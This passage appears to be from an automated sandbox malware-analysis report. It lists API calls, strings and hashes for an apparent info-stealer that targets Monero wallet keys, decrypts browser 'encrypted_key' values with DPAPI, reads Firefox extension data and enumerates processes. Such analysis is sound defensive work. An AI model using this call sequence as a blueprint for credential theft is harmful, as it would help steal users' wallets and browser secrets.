                      • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0118E838,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BA2E1
                    • lstrlen.KERNEL32(00000000,00000000), ref: 003BA3FF
                    • lstrlen.KERNEL32(00000000), ref: 003BA6BC
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                    • DeleteFileA.KERNEL32(00000000), ref: 003BA743
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 89e22168bac585afaf29629372cbf581826e2380f19c22c2845c556ea331a733
                    • Instruction ID: 45a04414fe58ab6e23db000ef5c58f42a0aea6b213400c2ccb8614039a16f658
                    • Opcode Fuzzy Hash: 89e22168bac585afaf29629372cbf581826e2380f19c22c2845c556ea331a733
                    • Instruction Fuzzy Hash: 71E1E97281060C9BCB16EBA4DC92FEE7738AF24304F50815DF516EA091EF346E09DB62
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0118E838,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BD481
                    • lstrlen.KERNEL32(00000000), ref: 003BD698
                    • lstrlen.KERNEL32(00000000), ref: 003BD6AC
                    • DeleteFileA.KERNEL32(00000000), ref: 003BD72B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: ea189af2326d893e89717b926fac8e1e9646eeb19d577e6cd7a8b1b1df44c0fc
                    • Instruction ID: a2349fd213a706ac3c828e9b21bd9d622de5ba841e1a3b936be68ed60a1c67ce
                    • Opcode Fuzzy Hash: ea189af2326d893e89717b926fac8e1e9646eeb19d577e6cd7a8b1b1df44c0fc
                    • Instruction Fuzzy Hash: EE91DA7291060C9BDB16EBA4DC96FEE7738AF14308F50416DF506EA091EF346E09DB62
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0118E838,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BD801
                    • lstrlen.KERNEL32(00000000), ref: 003BD99F
                    • lstrlen.KERNEL32(00000000), ref: 003BD9B3
                    • DeleteFileA.KERNEL32(00000000), ref: 003BDA32
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: ce1c3df62e164ab89c21eba519cce1b68cd5d9d76cc6044fb9958d8ce220de39
                    • Instruction ID: 253ac9c01c77773b389115077990a05e9d41a1f7c9906855fa44cff7bb934692
                    • Opcode Fuzzy Hash: ce1c3df62e164ab89c21eba519cce1b68cd5d9d76cc6044fb9958d8ce220de39
                    • Instruction Fuzzy Hash: CB81DB7291060C9BDB06FBA4DC96EEE7738AF14308F50452DF506EA091EF346E09DB62
                    APIs
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                      • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                      • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                      • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                      • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                      • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                      • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,003D1580,003D0D92), ref: 003BF54C
                    • lstrlen.KERNEL32(00000000), ref: 003BF56B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                    • String ID: ^userContextId=4294967295$moz-extension+++
                    • API String ID: 998311485-3310892237
                    • Opcode ID: 4eba89760b74ce8f3e519a61d7652abb7368cb4ebec50d74dc58d61693737b9b
                    • Instruction ID: 4ed6f56935f831d15694e7fefe7216654275f430f9b048c4611822ee298e9421
                    • Opcode Fuzzy Hash: 4eba89760b74ce8f3e519a61d7652abb7368cb4ebec50d74dc58d61693737b9b
                    • Instruction Fuzzy Hash: DA510071D0060CABDB05FBA0EC56EED7779AF54304F40852DF916AA191EE346E09CBA2
                    Strings
                    • s<, xrefs: 003C7111
                    • s<, xrefs: 003C72AE, 003C7179, 003C717C
                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003C718C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy
                    • String ID: s<$s<$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                    • API String ID: 3722407311-1540657006
                    • Opcode ID: 16a49d6a533f3ac260dc06afae98c432fb4b0b795f830a90a47cff446abe4a8d
                    • Instruction ID: de08e2e369296fdbfdfce7542936f0f2650135f40a38a31dec75f85b883ecec3
                    • Opcode Fuzzy Hash: 16a49d6a533f3ac260dc06afae98c432fb4b0b795f830a90a47cff446abe4a8d
                    • Instruction Fuzzy Hash: 5A5180B1C042089BDB25EBA0DC81FEEB7B4AF54304F1440ADE615B7281EB746E88CF55
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen
                    • String ID:
                    • API String ID: 367037083-0
                    • Opcode ID: 77b69d142564e516395d16f6053222947c6c5197133c644826f3b5220e7703e5
                    • Instruction ID: f12c6d1ee8c110b390c2d1f8f4edde97de043c25175890c5e344b58511256fc0
                    • Opcode Fuzzy Hash: 77b69d142564e516395d16f6053222947c6c5197133c644826f3b5220e7703e5
                    • Instruction Fuzzy Hash: F7411EB5D10209ABCB05EFE4D885FEEB778AB54704F10841DE416AB290DB75AA05CFA2
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                      • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                      • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                      • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                      • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                      • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                      • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003B9D39
                      • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9AEF
                      • Part of subcall function 003B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003B4EEE,00000000,?), ref: 003B9B01
                      • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9B2A
                      • Part of subcall function 003B9AC0: LocalFree.KERNEL32(?,?,?,?,003B4EEE,00000000,?), ref: 003B9B3F
                      • Part of subcall function 003B9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B9B84
                      • Part of subcall function 003B9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 003B9BA3
                      • Part of subcall function 003B9B60: LocalFree.KERNEL32(?), ref: 003B9BD3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                    • String ID: $"encrypted_key":"$DPAPI
                    • API String ID: 2100535398-738592651
                    • Opcode ID: 3666e70a0ee23c83c961fdf54b40cc23e7c21fbc01317fe630b307168bd3f6df
                    • Instruction ID: 263aa57cc9367ecb87cf95e1c90682ff8fe65882a5ccad89c28db95cfcfa57aa
                    • Opcode Fuzzy Hash: 3666e70a0ee23c83c961fdf54b40cc23e7c21fbc01317fe630b307168bd3f6df
                    • Instruction Fuzzy Hash: E23110B6D1020DABCF15DBE4DC85FEEB7B8BB48308F14451AEB05A7241E7359A04CBA1
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003D05B7), ref: 003C86CA
                    • Process32First.KERNEL32(?,00000128), ref: 003C86DE
                    • Process32Next.KERNEL32(?,00000128), ref: 003C86F3
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • CloseHandle.KERNEL32(?), ref: 003C8761
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                    • String ID:
                    • API String ID: 1066202413-0
                    • Opcode ID: c48630a78019bdc9835dca8b2b0a46fc49ecea198ea0cbc0405b44f2344575ea
                    • Instruction ID: 309c1f561a85c6cfd6618800c09c82f851f31b100b83aa8be8b44db77f525d4f
                    • Opcode Fuzzy Hash: c48630a78019bdc9835dca8b2b0a46fc49ecea198ea0cbc0405b44f2344575ea
                    • Instruction Fuzzy Hash: E7315C71901618ABCB26EB50DC45FEEB778EF45704F10419DE50AE61A0DF346E45CFA2
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003D0E00,00000000,?), ref: 003C79B0
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C79B7
                    • GetLocalTime.KERNEL32(?,?,?,?,?,003D0E00,00000000,?), ref: 003C79C4
                    • wsprintfA.USER32 ref: 003C79F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                    • String ID:
                    • API String ID: 377395780-0
                    • Opcode ID: a14c5ccbbf77041d7aeb5617ec9d67b3c9b55fbca32e7f18ee379ee270fc9076
                    • Instruction ID: 0fdebe0e43635d5d2503d0587a961c631e65f6cb5795419088d0bb46351dd7e5
                    • Opcode Fuzzy Hash: a14c5ccbbf77041d7aeb5617ec9d67b3c9b55fbca32e7f18ee379ee270fc9076
                    • Instruction Fuzzy Hash: 2E1115B2904118ABCB149FC9DD45BBEB7F8FB48B11F10421AF605E2280E2795944DBB2
                    APIs
                    • __getptd.LIBCMT ref: 003CC74E
                      • Part of subcall function 003CBF9F: __amsg_exit.LIBCMT ref: 003CBFAF
                    • __getptd.LIBCMT ref: 003CC765
                    • __amsg_exit.LIBCMT ref: 003CC773
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 003CC797
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                    • String ID:
                    • API String ID: 300741435-0
                    • Opcode ID: bcdb634c7a3eb1376faa62abdadd804548b8f7411635f8e6a8172f7f199555e7
                    • Instruction ID: c51286c3d6e5bdf1fc6bbae6aad283d273d37148f361f4034b19d5e0ac6673c2
                    • Opcode Fuzzy Hash: bcdb634c7a3eb1376faa62abdadd804548b8f7411635f8e6a8172f7f199555e7
                    • Instruction Fuzzy Hash: 64F090329156149FDB23BBB86C07F5DB3A0AF00724F25514DF408EE2D2CB645D409F56
                    APIs
                      • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 003C4F7A
                    • lstrcat.KERNEL32(?,003D1070), ref: 003C4F97
                    • lstrcat.KERNEL32(?,01188A70), ref: 003C4FAB
                    • lstrcat.KERNEL32(?,003D1074), ref: 003C4FBD
                      • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C492C
                      • Part of subcall function 003C4910: FindFirstFileA.KERNEL32(?,?), ref: 003C4943
                      • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FDC), ref: 003C4971
                      • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FE0), ref: 003C4987
                      • Part of subcall function 003C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003C4B7D
                      • Part of subcall function 003C4910: FindClose.KERNEL32(000000FF), ref: 003C4B92
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                    • String ID:
                    • API String ID: 2667927680-0
                    • Opcode ID: 4c589258798313bbadc309ab50ab58bbb038f745a9670b65916ca3a5e9792fa6
                    • Instruction ID: 080dcad8e4f3baff790ae4c296ea466eb29b49efab4b3f8174de317bdc6c4008
                    • Opcode Fuzzy Hash: 4c589258798313bbadc309ab50ab58bbb038f745a9670b65916ca3a5e9792fa6
                    • Instruction Fuzzy Hash: AD21A7B690020867C755F760EC46FE9333CAB54700F004549B64DDA181EE759ACDDBA3